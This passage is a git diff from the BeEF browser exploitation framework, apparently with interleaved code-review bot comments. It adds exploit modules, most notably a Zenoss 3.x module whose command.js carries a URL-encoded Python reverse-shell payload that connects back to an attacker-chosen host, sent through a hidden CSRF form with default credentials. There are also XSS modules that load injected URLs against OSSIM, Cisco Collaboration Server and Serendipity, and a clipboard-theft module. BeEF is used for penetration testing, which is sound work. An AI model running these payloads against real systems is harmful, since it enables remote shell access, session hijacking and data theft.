Tested on version 2.3 however other versions are likely to be vulnerable." + authors: ["bcoles"] + target: + working: ["ALL"] diff --git a/modules/exploits/wanem_command_execution/module.rb b/modules/exploits/wanem_command_execution/module.rb new file mode 100644 index 000000000..ca8d01c1b --- /dev/null +++ b/modules/exploits/wanem_command_execution/module.rb @@ -0,0 +1,27 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +################################################################################ +# For more information see: http://itsecuritysolutions.org/2012-08-12-WANem-v2.3-multiple-vulnerabilities/ +################################################################################ +class Wanem_command_execution < BeEF::Core::Command + + def self.options + configuration = BeEF::Core::Configuration.instance + lhost = "#{configuration.get("beef.http.host")}" + lhost = "" if lhost == "0.0.0.0" + return [ + { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '192.168.1.1'}, + { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '80' }, + { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost}, + { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'}, + ] + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/window_mail_client_dos/config.yaml b/modules/exploits/window_mail_client_dos/config.yaml deleted file mode 100644 index 891f16919..000000000 --- a/modules/exploits/window_mail_client_dos/config.yaml +++ /dev/null 
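Review bot: In `wanem_command_execution/module.rb`, `self.options` resets `lhost` to an empty string when `beef.http.host` is `0.0.0.0`, but nothing in the hunk says why, and the `'lhost'` option then defaults to an empty value that `command.js` interpolates unchanged. A one-line comment above the reset would record the intent, presumably `# 0.0.0.0 is a bind address, not a reachable one, so no default is offered`. The assignment itself would read more directly as `lhost = configuration.get("beef.http.host").to_s` than with the call wrapped in `"#{...}"`. The same two lines appear in `zenoss_3x_command_execution/module.rb` later in this commit.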
@@ -1,26 +0,0 @@ -# -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. -# -beef: - module: - windows_mail_client_dos: - enable: true - category: "Exploits" - name: "Windows Mail Client DoS" - description: "This module exploits an unhandled exception in Windows Mail to crash the client remotely.

Windows Mail is launched and then crashed if it is not already open. It comes installed by default on Windows Vista (but it's also vulnerable on Windows 7 SP2).

The protocol handler used will be: nntp." - authors: ["bcoles"] - target: - user_notify: ["FF", "S"] - not_working: ["All"] diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js new file mode 100644 index 000000000..562181c00 --- /dev/null +++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var uri = '<%= @uri.gsub(/'/, "\\'") %>'; + + var alienvault_iframe_<%= @command_id %> = beef.dom.createInvisibleIframe(); + alienvault_iframe_<%= @command_id %>.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + +}); + diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml new file mode 100644 index 000000000..5f5a8926a --- /dev/null +++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + alienvault_ossim_3_1_xss: + enable: true + category: ["Exploits", "XSS"] + name: "AlienVault OSSIM 3.1 XSS" + description: "Attempts to hook AlienVault OSSIM 3.1 using XSS.
For more information see: http://www.exploit-db.com/exploits/20062/" + authors: ["bcoles", "muts"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb new file mode 100644 index 000000000..9070c0f95 --- /dev/null +++ b/modules/exploits/xss/alienvault_ossim_3.1_xss/module.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Alienvault_ossim_3_1_xss < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + + return [ + {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/ossim/top.php?option=3&soption=3&url='} + ] + + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js new file mode 100644 index 000000000..ff643b786 --- /dev/null +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var uri = '<%= @uri.gsub(/'/, "\\'") %>'; + + var cisco_collaboration_iframe = beef.dom.createInvisibleIframe(); + cisco_collaboration_iframe.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + +}); + 
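Review bot: In `alienvault_ossim_3.1_xss/module.rb`, `hook_uri` is built from `beef.http.host` and `beef.http.port` but is not referenced anywhere in the lines shown; the only option returned is a single-quoted `'uri'` literal, which Ruby does not interpolate. Unless the rendering of this page has dropped part of that default value, the `configuration = ...` and `hook_uri = ...` lines are dead code and can be removed. `cisco_collaboration_server_5_xss/module.rb` and `serendipity_1.6_xss/module.rb` in this commit have the same shape.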
diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml new file mode 100644 index 000000000..8ad1a6ccc --- /dev/null +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + cisco_collaboration_server_5_xss: + enable: true + category: ["Exploits", "XSS"] + name: "Cisco Collaboration Server 5 XSS" + description: "Attempts to hook Cisco Collaboration Server 5 using XSS.
For more information see: http://www.exploit-db.com/exploits/11403/" + authors: ["bcoles", "s4squatch"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb new file mode 100644 index 000000000..75b55ba40 --- /dev/null +++ b/modules/exploits/xss/cisco_collaboration_server_5_xss/module.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Cisco_collaboration_server_5_xss < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + + return [ + {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/webline/html/admin/wcs/LoginPage.jhtml?oper=&dest=">'} + ] + + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/xss/serendipity_1.6_xss/command.js b/modules/exploits/xss/serendipity_1.6_xss/command.js new file mode 100644 index 000000000..71c8bf1c4 --- /dev/null +++ b/modules/exploits/xss/serendipity_1.6_xss/command.js @@ -0,0 +1,17 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + + var uri = '<%= @uri.gsub(/'/, "\\'") %>'; + + var serendipity_iframe = beef.dom.createInvisibleIframe(); + serendipity_iframe.setAttribute('src', uri); + + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + +}); + diff --git a/modules/exploits/xss/serendipity_1.6_xss/config.yaml b/modules/exploits/xss/serendipity_1.6_xss/config.yaml new file mode 100644 index 000000000..472bab376 --- /dev/null 
+++ b/modules/exploits/xss/serendipity_1.6_xss/config.yaml @@ -0,0 +1,15 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +beef: + module: + serendipity_1_6_xss: + enable: true + category: ["Exploits", "XSS"] + name: "Serendipity <= 1.6 XSS" + description: "Attempts to hook Serendipity <= 1.6 using XSS.
For more information see: http://www.exploit-db.com/exploits/18884/" + authors: ["bcoles", "Stefan Schurtz"] + target: + unknown: ["ALL"] diff --git a/modules/exploits/xss/serendipity_1.6_xss/module.rb b/modules/exploits/xss/serendipity_1.6_xss/module.rb new file mode 100644 index 000000000..fd4b1afdc --- /dev/null +++ b/modules/exploits/xss/serendipity_1.6_xss/module.rb @@ -0,0 +1,23 @@ +# +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission +# +class Serendipity_1_6_xss < BeEF::Core::Command + + def self.options + + configuration = BeEF::Core::Configuration.instance + hook_uri = "http://#{configuration.get("beef.http.host")}:#{configuration.get("beef.http.port")}/hook.js" + + return [ + {'name' => 'uri', 'ui_label' => 'Target URL', 'value' => 'http://target/serendipity/serendipity_admin_image_selector.php?serendipity[textarea]=\'"'} + ] + + end + + def post_execute + save({'result' => @datastore['result']}) + end + +end diff --git a/modules/exploits/zenoss_3x_command_execution/command.js b/modules/exploits/zenoss_3x_command_execution/command.js new file mode 100644 index 000000000..087133372 --- /dev/null +++ b/modules/exploits/zenoss_3x_command_execution/command.js 
@@ -0,0 +1,34 @@ +// +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission +// + +beef.execute(function() { + var rhost = '<%= @rhost %>'; + var rport = '<%= @rport %>'; + var lhost = '<%= @lhost %>'; + var lport = '<%= @lport %>'; + var user = '<%= @user %>'; + var pass = '<%= @pass %>'; + var target = 'http://'+rhost+':'+rport+'/zport/About/showDaemonXMLConfig' + + // reverse python payload + var payload = unescape('%70%79%74%68%6f%6e%20%2d%63%20%22%69%6d%70%6f%72%74%20%73%6f%63%6b%65%74%2c%73%75%62%70%72%6f%63%65%73%73%2c%6f%73%3b%68%6f%73%74%3d%5c%22'+lhost+'%5c%22%3b%70%6f%72%74%3d'+lport+'%3b%73%3d%73%6f%63%6b%65%74%2e%73%6f%63%6b%65%74%28%73%6f%63%6b%65%74%2e%41%46%5f%49%4e%45%54%2c%73%6f%63%6b%65%74%2e%53%4f%43%4b%5f%53%54%52%45%41%4d%29%3b%73%2e%63%6f%6e%6e%65%63%74%28%28%68%6f%73%74%2c%70%6f%72%74%29%29%3b%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%30%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%31%29%3b%20%6f%73%2e%64%75%70%32%28%73%2e%66%69%6c%65%6e%6f%28%29%2c%32%29%3b%70%3d%73%75%62%70%72%6f%63%65%73%73%2e%63%61%6c%6c%28%5b%5c%22%2f%62%69%6e%2f%73%68%5c%22%2c%5c%22%2d%69%5c%22%5d%29%3b%22') + + // send request + var zenoss_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(target, "POST", [ + {'type':'hidden', 'name':'__ac_name', 'value':user}, + {'type':'hidden', 'name':'__ac_password', 'value':pass}, + {'type':'hidden', 'name':'daemon', 'value':payload} + ]); + beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted"); + + // clean up + cleanup = function() { + document.body.removeChild(zenoss_iframe_<%= @command_id %>); + } + setTimeout("cleanup()", 15000); + +}); + diff --git a/modules/exploits/zenoss_3x_command_execution/config.yaml b/modules/exploits/zenoss_3x_command_execution/config.yaml new file mode 100644 index 000000000..5786425da --- /dev/null 
+++ b/modules/exploits/zenoss_3x_command_execution/config.yaml
@@ -0,0 +1,18 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
+################################################################################
+beef:
+ module:
+ zenoss_command_execution:
+ enable: true
+ category: "Exploits"
+ name: "Zenoss 3.x Command Execution"
+ description: "Attempts to get a reverse shell on a Zenoss 3.x server. Valid credentials are required."
+ authors: ["bcoles"]
+ target:
+ working: ["ALL"]
diff --git a/modules/exploits/zenoss_3x_command_execution/module.rb b/modules/exploits/zenoss_3x_command_execution/module.rb
new file mode 100644
index 000000000..c79f60193
--- /dev/null
+++ b/modules/exploits/zenoss_3x_command_execution/module.rb
@@ -0,0 +1,29 @@
+#
+# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net
+# Browser Exploitation Framework (BeEF) - http://beefproject.com
+# See the file 'doc/COPYING' for copying permission
+#
+################################################################################
+# For more information see: http://itsecuritysolutions.org/2012-07-30-zenoss-3.2.1-multiple-security-vulnerabilities/
+################################################################################
+class Zenoss_command_execution < BeEF::Core::Command
+
+ def self.options
+ configuration = BeEF::Core::Configuration.instance
+ lhost = "#{configuration.get("beef.http.host")}"
+ lhost = "" if lhost == "0.0.0.0"
+ return [
+ { 'name' => 'rhost', 'ui_label' => 'Target Host', 'value' => '127.0.0.1'},
+ { 'name' => 'rport', 'ui_label' => 'Target Port', 'value' => '8080' },
+ { 'name' => 'lhost', 'ui_label' => 'Local Host', 'value' => lhost},
+ { 'name' => 'lport', 'ui_label' => 'Local Port', 'value' => '4444'},
+ { 'name' => 'user', 'ui_label' => 'Username', 'value' => 'admin'},
+ { 'name' => 'pass', 'ui_label' => 'Password', 'value' => 'zenoss'},
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end
diff --git a/modules/exploits/zenoss_add_user_csrf/command.js b/modules/exploits/zenoss_add_user_csrf/command.js
index 9650a2684..8727f8bc8 100644
--- a/modules/exploits/zenoss_add_user_csrf/command.js
+++ b/modules/exploits/zenoss_add_user_csrf/command.js
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var base = '<%= @base %>'; var user_level = '<%= @user_level %>'; diff --git a/modules/exploits/zenoss_add_user_csrf/config.yaml b/modules/exploits/zenoss_add_user_csrf/config.yaml index 3ae083e7a..458e0c701 100644 --- a/modules/exploits/zenoss_add_user_csrf/config.yaml +++ b/modules/exploits/zenoss_add_user_csrf/config.yaml 
@@ -1,25 +1,15 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: zenoss_add_user_csrf: enable: true category: "Exploits" - name: "Zenoss Add User CSRF" - description: "Attempts to add a user to a Zenoss Core <= 3.2.1 server." + name: "Zenoss 3.x Add User CSRF" + description: "Attempts to add a user to a Zenoss Core 3.x server." authors: ["bcoles"] target: working: ["ALL"] diff --git a/modules/exploits/zenoss_add_user_csrf/module.rb b/modules/exploits/zenoss_add_user_csrf/module.rb index 28fac6d60..37eee8336 100644 --- a/modules/exploits/zenoss_add_user_csrf/module.rb +++ b/modules/exploits/zenoss_add_user_csrf/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Zenoss_add_user_csrf < BeEF::Core::Command diff --git a/modules/exploits/zenoss_daemon_csrf/command.js b/modules/exploits/zenoss_daemon_csrf/command.js index 4b753f8ea..0ef85cdce 100644 --- a/modules/exploits/zenoss_daemon_csrf/command.js +++ b/modules/exploits/zenoss_daemon_csrf/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var base = '<%= @base %>'; var service = '<%= @service %>'; diff --git a/modules/exploits/zenoss_daemon_csrf/config.yaml b/modules/exploits/zenoss_daemon_csrf/config.yaml index 9249f7d99..d3871c1d6 100644 --- a/modules/exploits/zenoss_daemon_csrf/config.yaml +++ b/modules/exploits/zenoss_daemon_csrf/config.yaml 
@@ -1,25 +1,15 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: zenoss_daemon_csrf: enable: true category: "Exploits" - name: "Zenoss Daemon CSRF" - description: "Attempts to start/stop/restart daemons on a Zenoss Core <= 3.2.1 server." + name: "Zenoss 3.x Daemon CSRF" + description: "Attempts to start/stop/restart daemons on a Zenoss Core 3.x server." authors: ["bcoles"] target: working: ["ALL"] diff --git a/modules/exploits/zenoss_daemon_csrf/module.rb b/modules/exploits/zenoss_daemon_csrf/module.rb index 148f0c6bf..d0e9c9693 100644 --- a/modules/exploits/zenoss_daemon_csrf/module.rb +++ b/modules/exploits/zenoss_daemon_csrf/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Zenoss_daemon_csrf < BeEF::Core::Command diff --git a/modules/host/clipboard_theft/command.js b/modules/host/clipboard_theft/command.js index 1c717da87..1f4db5740 100644 --- a/modules/host/clipboard_theft/command.js +++ b/modules/host/clipboard_theft/command.js 
@@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { if (clipboardData.getData("Text") !== null) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "clipboard="+clipboardData.getData("Text")); diff --git a/modules/host/clipboard_theft/config.yaml b/modules/host/clipboard_theft/config.yaml index ec30fcb28..b0f618fce 100644 --- a/modules/host/clipboard_theft/config.yaml +++ b/modules/host/clipboard_theft/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/clipboard_theft/module.rb b/modules/host/clipboard_theft/module.rb index 75274ab32..daa5e6ac5 100644 --- a/modules/host/clipboard_theft/module.rb +++ b/modules/host/clipboard_theft/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Clipboard_theft < BeEF::Core::Command 
diff --git a/modules/host/detect_cups/command.js b/modules/host/detect_cups/command.js index e05d44658..a2608dc7d 100644 --- a/modules/host/detect_cups/command.js +++ b/modules/host/detect_cups/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var result = "Not Installed"; diff --git a/modules/host/detect_cups/config.yaml b/modules/host/detect_cups/config.yaml index 9b14c62f1..0658974e6 100644 --- a/modules/host/detect_cups/config.yaml +++ b/modules/host/detect_cups/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: diff --git a/modules/host/detect_cups/module.rb b/modules/host/detect_cups/module.rb index a2cef67a4..fef9a3fc1 100644 --- a/modules/host/detect_cups/module.rb +++ b/modules/host/detect_cups/module.rb @@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_cups < BeEF::Core::Command 
diff --git a/modules/host/detect_google_desktop/command.js b/modules/host/detect_google_desktop/command.js index 428db53e0..c1749d5bb 100644 --- a/modules/host/detect_google_desktop/command.js +++ b/modules/host/detect_google_desktop/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 2.0 (the "License"); -// you may not use this file except in compliance with the License. -// You may obtain a copy of the License at -// -// http://www.apache.org/licenses/LICENSE-2.0 -// -// Unless required by applicable law or agreed to in writing, software -// distributed under the License is distributed on an "AS IS" BASIS, -// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -// See the License for the specific language governing permissions and -// limitations under the License. +// Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +// Browser Exploitation Framework (BeEF) - http://beefproject.com +// See the file 'doc/COPYING' for copying permission // + beef.execute(function() { var dom = document.createElement('b'); diff --git a/modules/host/detect_google_desktop/config.yaml b/modules/host/detect_google_desktop/config.yaml index 4a0d23f18..b3d42e577 100644 --- a/modules/host/detect_google_desktop/config.yaml +++ b/modules/host/detect_google_desktop/config.yaml 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # beef: module: @@ -24,5 +14,5 @@ beef: target: not_working: ALL: - os: ["iPhone"] + os: ["iOS"] working: ["ALL"] diff --git a/modules/host/detect_google_desktop/module.rb b/modules/host/detect_google_desktop/module.rb index cadf07b80..949466bb9 100644 --- a/modules/host/detect_google_desktop/module.rb +++ b/modules/host/detect_google_desktop/module.rb 
@@ -1,17 +1,7 @@ # -# Copyright 2012 Wade Alcorn wade@bindshell.net -# -# Licensed under the Apache License, Version 2.0 (the "License"); -# you may not use this file except in compliance with the License. -# You may obtain a copy of the License at -# -# http://www.apache.org/licenses/LICENSE-2.0 -# -# Unless required by applicable law or agreed to in writing, software -# distributed under the License is distributed on an "AS IS" BASIS, -# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. -# See the License for the specific language governing permissions and -# limitations under the License. +# Copyright (c) 2006-2012 Wade Alcorn - wade@bindshell.net +# Browser Exploitation Framework (BeEF) - http://beefproject.com +# See the file 'doc/COPYING' for copying permission # class Detect_google_desktop < BeEF::Core::Command diff --git a/modules/host/detect_protocol_handlers/command.js b/modules/host/detect_protocol_handlers/command.js index 90246fba2..b9c2c76bc 100644 --- a/modules/host/detect_protocol_handlers/command.js +++ b/modules/host/detect_protocol_handlers/command.js @@ -1,18 +1,9 @@ // -// Copyright 2012 Wade Alcorn wade@bindshell.net -// -// Licensed under the Apache License, Version 